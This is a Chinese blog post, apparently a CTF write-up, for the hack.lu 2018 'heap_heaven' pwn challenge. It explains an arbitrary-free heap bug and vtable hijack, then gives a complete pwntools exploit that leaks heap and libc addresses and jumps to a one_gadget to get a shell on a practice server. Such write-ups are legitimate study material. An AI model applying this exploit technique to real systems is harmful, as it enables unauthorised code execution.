hack_lu_2018_heap_heaven

最新推荐文章于 2021-09-01 13:13:09 发布
最新推荐文章于 2021-09-01 13:13:09 发布
阅读量432 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107577259
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

hack_lu_2018_heap_heaven

首先,检查一下程序的保护机制

然后我们用IDA分析一下,这个free没有检查范围,因此可以任意地址free。

我们只要想办法free掉state,然后控制funcs指针,即可执行任意代码

但是程序中我们不能自己malloc,因此无法将其再申请回来进行控制。查看state结构体

其位置与堆块的fd位置一样,因此,我们首先在fastbin里放一个chunk,然后再free掉state,这样,funcs就指向了第一个chunk,而funcs是一个虚表指针,因此,我们只需在第一个chunk里事先伪造好虚表即可。

而show功能,其使用的是*v2,因此,我们free掉一个unsorted bin范围的chunk,那么puts(*v2)也就是puts(main_arena_88),可以泄露出top chunk的地址,从而可以得到state的地址,然后再利用edit低字节覆盖指针,继续泄露libc地址等。

#coding:utf8
from pwn import *

#sh = process('./hack_lu_2018_heap_heaven',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('node3.buuoj.cn',27447)
libc = ELF('./libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget = 0xf02a4

def edit(offset,size,payload):
   sh.sendlineafter('[5] : exit','1')
   sh.sendlineafter('write?',str(size))
   sh.sendlineafter('offset?',str(offset))
   sleep(0.1)
   sh.send(payload)

def delete(offset):
   sh.sendlineafter('[5] : exit','3')
   sh.sendlineafter('free?',str(offset))

def show(offset):
   sh.sendlineafter('[5] : exit','4')
   sh.sendlineafter('leak?',str(offset))

fake_chunk = p64(0) + p64(0x91)
fake_chunk += 'a'*0x80
fake_chunk += p64(0) + p64(0x21)
fake_chunk += 'b'*0x10
fake_chunk += p64(0) + p64(0x21)
fake_chunk += 'c'*0x10
edit(0,len(fake_chunk),fake_chunk)

delete(0x10)
show(0x10)
sh.recvuntil('\n')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
edit(0x10,1,p8(0x89))
show(0x10)
sh.recvuntil('\n')
mmap_addr = u64('\x00' + sh.recvuntil('\n',drop = True).ljust(7,'\x00'))
print 'mmap_addr=',hex(mmap_addr)
edit(0x10,1,p8(0x98))
show(0x10)
sh.recvuntil('\n')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)

fake_chunk = p64(0) + p64(0x21)
fake_chunk += 'a'*0x10
fake_chunk += p64(0) + p64(0x21)
fake_chunk += 'b'*0x10
edit(0,len(fake_chunk),fake_chunk)
#放入一个chunk到fastbin
delete(0x10)
edit(0x8,8,p64(one_gadget_addr)) #布置虚表指针

state_addr = heap_addr - 0x30
delete(state_addr - mmap_addr) #将fake_chunk连接到state的fd处,也就是覆盖了原来的虚表指针,指向我们可以控制的地方,布下了one_gadget函数指针

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Java单例模式篇] 单例设计模式的9种实现
SolarL的博客
03-21 985
手写单例设计模式 写在前面 我们常见的设计模式有模板方法模式、工厂模式、适配器模式、代理模式、装饰者模式、观察者模式、单例模式等,单例设计模式可以说是做简单的设计模式,本篇文章将专门针对单例设计模式进行分析实现,做到手写单例,不心慌。 有的时候我们只需要某个类只有一个对象产生,不需要更多的实例对象,那么,我们就可以考虑用单例设计模式实现此需求。 一、单例模式的特点 (1) 一个类只允许产...
单例模式的四种实现方式(饿汉模式、懒汉模式、静态内部类、枚举类)
LINchuana的博客
07-25 1016
首先,设计模式是我们程序员在软件开发过程中面临的一般问题的解决方案,通过学习设计模式可以使我们在编程时更加有条理性,同时培养我们写代码的思维能力,从而提高我们的工作效率。
你必须了解的Java:详解单例模式
qq_39817135的博客
09-25 179
单例模式 本文借鉴:https://www.runoob.com/design-pattern/singleton-pattern.html单例模式(Singleton Pattern)是 Java 中最简单的设计模式之一。这种类型的设计模式属于创建型模式,它提供了一种创建对象的最佳方式。 这种模式涉及到一个单一的类: 该类负责创建自己的对象,同时确保只有单个对象被创建。 这个类提供了一种访问其...
设计模式_单例模式的几种实现方式
迎难而上
06-27 1139
单例模式是一个老生常谈的问题,这里对单例模式实现做一下总结 分类 懒汉模式 饿汉模式 1. 2. 3.
单例设计模式的四种实现方式
Lzp_csdn1的博客
11-23 360
单例设计模式的三个要求: 只能有一个实例 必须自行创建自己的唯一实例 要对外提供该实例 方法一:饿汉式 直接创建实例对象,不管你是否需要这个对象都会去创建 /** * 方法一 * 单例模式实现:饿汉式,线程安全 但效率比较低 */ public class Singleton1 { // 自行创建自己的唯一实例 private static final Singleton1 instance = new Singleton1(); // 构造器私有
[设计模式]单例设计模式的6种实现方式(超全面哟)
YuanMxy'Home
07-24 646
无论什么开发中,设计模式都起着关键的作用,其中比较常用的当属单例了~那么什么是单例设计模式呢? 1.什么是单例设计模式(SINGLETON) 单例模式指的是在应用整个生命周期内只能存在一个实例。单例模式是一种被广泛使用的设计模式。他有很多好处,能够避免实例对象的重复创建,减少创建实例的系统开销,节省内存。 有一个比喻:俺有6个漂亮的老婆,她们的老公都是我,我就是我们家里的老公Sigleto...
C++ 单例模式的几种实现方式研究
12-31
单例模式,可以说设计模式中最常应用的一种模式了,据说也是面试官最喜欢的题目。但是如果没有学过设计模式的人,可能不会想到要去应用单例模式,面对单例模式适用的情况,可能会优先考虑使用全局或者静态变量的方式...
js单例模式的两种方案
10-26
JavaScript中,单例模式是一种常用的软件设计模式,其主要目的是确保一个类只有一个实例,并提供一个全局访问点。这种模式广泛应用于需要频繁创建的对象,例如日志记录器、数据库连接等场景,通过单例模式可以有效...
设计模式–五种实现单例模式的方式
12-21
单例模式设计模式中的基础,理解和掌握不同实现方式有助于我们在实际开发中选择最适合的方案。需要注意的是,虽然单例模式能解决特定问题,但也可能带来一些弊端,如扩展性问题。在使用单例模式时,需权衡其优缺点...
JavaScript源代码】JS实现单例模式的6种方案汇总.docx
12-29
JavaScript中的单例模式是一种设计模式,它确保一个类只有一个实例,并提供一个全局访问点来获取这个唯一实例。这种模式在JavaScript开发中非常有用,尤其是在处理全局变量、避免命名冲突、节省内存以及统一接口等...
单例设计模式
weixin_44417406的博客
03-02 73
单例设计模式的概述 单例模式,是一种常用的软件设计模式。通过单例模式可以保证系统中,应用该模式的这个类只有一个实例。即一个类只有一个对象实例。 单例设计模式实现步骤 将构造方法私有化,使其不能在类的外部通过new关键字实例化该类对象。 在该类内部产生一个唯一的实例化对象 定义一个静态方法返回这个唯一对象。 例设计模式的类型 根据实例化对象的时机单例设计模式又分为以下两种: 饿汉单例设计模式 懒汉单例设计模式 饿汉式单例设计模式 饿汉单例设计模式就是使用类的时候已经将对象创建完毕,不管以后会不会使用到
设计模式——单例模式——8种实现方式
qq_42247231的博客
06-24 163
微信搜索:编程笔记本。获取更多干货。 点击上方蓝字关注我,我们一起学编程 欢迎小伙伴们分享、转载、私信、赞赏 单例模式 文章目录单例模式1. 饿汉式(静态常量)2. 饿汉式(静态代码块)3. 懒汉式(线程不安全)4. 懒汉式(线程安全,同步方法)5. 懒汉式(线程安全,同步代码块) x6. 双重检查7. 静态内部类8. 枚举 所谓类的单例设计模式,就是采取一定的方法保证在整个软件系统中,对某个类只存在一个对象实例,并且该类只提供一个取得该对象实例的方法(静态方法)。 步骤: 构造器私有化(防止 new
单例设计模式八种实现
景鹏虎晓的博客
09-03 338
目录一、饿汉式之静态常量1.1 实现步骤1.2 优缺点说明二、饿汉式之静态代码块三、静态内部类四、枚举式五、懒汉式(线程不安全)六、懒汉式(线程安全)七、懒汉式(同步代码块)八、双重检查锁 一、饿汉式之静态常量 1.1 实现步骤 1. 私有化构造方法 2. 本类内部创建对象实例并私有化 3. 提供一个公开的静态方法返回实例对象,供外部访问 代码实现 public class Singleton implements Serializable { //1.构造器私有化 private Sin
设计模式】——单例模式(七种)
我爱吃土豆
12-24 6973
一、单例模式 1.饿汉式 public class Singleton { private static Singleton instance = new Singleton(); private Singleton (){} public static Singleton getInstance() { return insta...
单例设计模式实现
u011386422的专栏
01-09 400
设计模式:对问题行之有效的解决方法,其实他是一种思想,适用于任何编程语言。 单例设计模式:保证一个类在内存中的对象的唯一性,就是只能创建一个该类的对象。 如何保证对象的唯一性呢? (1)不允许其他程序用new方法创建该类的对象; (2)在该类中创建一个本类实例; (3)对外提供一个公有方法,让其他程序可以获得该实例。 步骤: (1)私有化该类的构造函数; (2)通过new在本类中创
设计模式-单例设计模式(8种)
WH1731754188的博客
07-29 336
java设计模式 单例设计模式 本章主要讲解单例设计模式有几种,并由代码引入,以及涉及的相关问题都会展示,欢迎各位看客点评,如有错误请指出~ 第一种:饿汉式(静态变量) class Singleton { //1. 构造器私有化, 外部能new private Singleton() { } //2.本类内部创建对象实例 private final static Singleton i...
设计模式单例模式(7种实现方式)
yjntue的专栏
03-04 216
单例模式,顾名思义就是只有一个实例,并且它自己负责创建自己的对象,这个类提供了一种访问其唯一的对象的方式,可以直接访问,不需要实例化该类的对象。 1、饿汉式: /** * @Auther: yjntue * @Date: 2020/3/4 19:48 * @Description: * 饿汉式 若一个类的成员都是比较重的资源,这种方式不合适 * 不允许被继承 */ public ...
实现单例设计模式(懒汉,饿汉)
qq_41088031的博客
09-01 319
单例模式(Singleton Pattern)是 Java 中最简单的设计模式之一。这种类型的设计模式属于创建型模式,它提供了一种创建对象的最佳方式。 这种模式涉及到一个单一的类,该类负责创建自己的对象,同时确保只有单个对象被创建。这个类提供了一种访问其唯一的对象的方式,可以直接访问,不需要实例化该类的对象。 注意: 1、单例类只能有一个实例。 2、单例类必须自己创建自己的唯一实例。 3、单例类必须给所有其他对象提供这一实例。 单例模式的几种实现方式: 1. 懒汉式,线程不安全 是否 L
单例模式的终极实现方案
weixin_33743880的博客
10-14 117
单例模式(Singleton)是一种使用率非常高的设计模式,其主要目的在于保证某一类在运行期间仅被创建一个实例,并为该实例提供了一个全局访问方法,通常命名为getInstance()方法。单例模式的本质简言之即是: 控制实例数目 以Java为例,单例模式通常可分为饿汉式和懒汉式两种常规实现方式 饿汉式单例实现 饿汉式顾名思义,就是对类实例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值